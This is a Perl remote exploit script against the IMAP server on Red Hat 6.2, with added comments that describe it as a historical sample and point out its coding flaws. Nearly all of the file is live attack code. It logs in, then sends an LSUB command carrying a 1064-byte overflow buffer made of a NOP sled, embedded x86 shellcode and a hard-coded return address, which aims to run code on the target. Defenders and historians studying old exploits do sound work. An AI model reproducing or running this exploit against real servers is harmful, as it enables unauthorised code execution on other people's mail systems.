#!/usr/bin/perl
# remote imapd exploit for Red Hat 6.2 (Zoot) by Zucco (zucco@netposta.net)
# thanks to Narr0w, dethy, SkyLaZarT.
# IMAP4rev1 v12.264
#
# Structure of this script, for anyone reading it as a historical sample:
# it logs in to an IMAP server with a valid account, then sends an LSUB
# command whose literal argument is a 1064-byte stack-smash buffer
# (NOP sled + machine-code payload + repeated return address).
# Observable on the wire as: an authenticated LSUB followed by a
# `{1064}` literal announcement and a long run of 0x90 bytes.
#
# NOTE(review): the script has no `use strict`/`use warnings`, never checks
# that the socket was created, and never reads server responses, so it
# cannot tell whether the connection, the LOGIN or the overflow succeeded.
use IO::Socket;

# Usage check tests $ARGV[2] (password), so <offset> is optional in practice;
# with three arguments $offset is undef and is treated as 0 in the addition below.
if (!$ARGV[2]) {
  print "\n\tUsage: $0 <hostname> <username> <password> <offset>\n\n";
  exit;
}

$host = $ARGV[0];
$user = $ARGV[1];
$pass = $ARGV[2];
$offset = $ARGV[3];
# Hard-coded guess for the stack address; presumably from a target with no
# address randomisation, so only a small user-supplied offset is adjusted.
$retaddr = "0xbffff2c8";

# Numeric address plus offset, packed as a native-order signed 32-bit value.
$ret = (hex $retaddr) + $offset;
$retreal = pack("l", $ret);

# Buffer layout: 613 NOP bytes, 67 bytes of payload, then the 4-byte
# return address repeated 96 times (384 bytes) -- 1064 bytes in total,
# which is exactly the literal size announced in the LSUB command below.
$nops = "\x90" x 613;
# Opaque x86 machine code taken as-is from the original author; its
# semantics are not analysed here.
$shellcode = "\xeb\x35\x5e\x80\x46\x01\x30\x80\x46\x02\x30\x80\x46\x03\x30".
             "\x80\x46\x05\x30\x80\x46\x06\x30\x89\xf0\x89\x46\x08\x31\xc0".
             "\x88\x46\x07\x89\x46\x0c\xb0\x0b\x89\xf3\x8d\x4e\x08\x8d\x56".
             "\x0c\xcd\x80\x31\xdb\x89\xd8\x40\xcd\x80\xe8\xc6\xff\xff\xff".
             "\x2f\x32\x39\x3e\x2f\x43\x38"; # shellcode by The Tekneeq Crew

$buffer .= $nops;
$buffer .= $shellcode;
$buffer .= $retreal x 96;

# Plain TCP connection to IMAP port 143; the return value is not checked,
# so a refused connection leaves $sock undef and the prints below fail.
$sock = IO::Socket::INET->new( PeerAddr => "$host",
                               Proto    => "tcp",
			       PeerPort => "143");

# Credentials are sent in clear text; the same tag "1" is reused for both
# commands. Note the LSUB line ends in "\n" only, unlike the other two.
print $sock "1 LOGIN $user $pass\r\n";
print $sock "1 LSUB \"\" {1064}\n";
print $sock "$buffer\r\n";
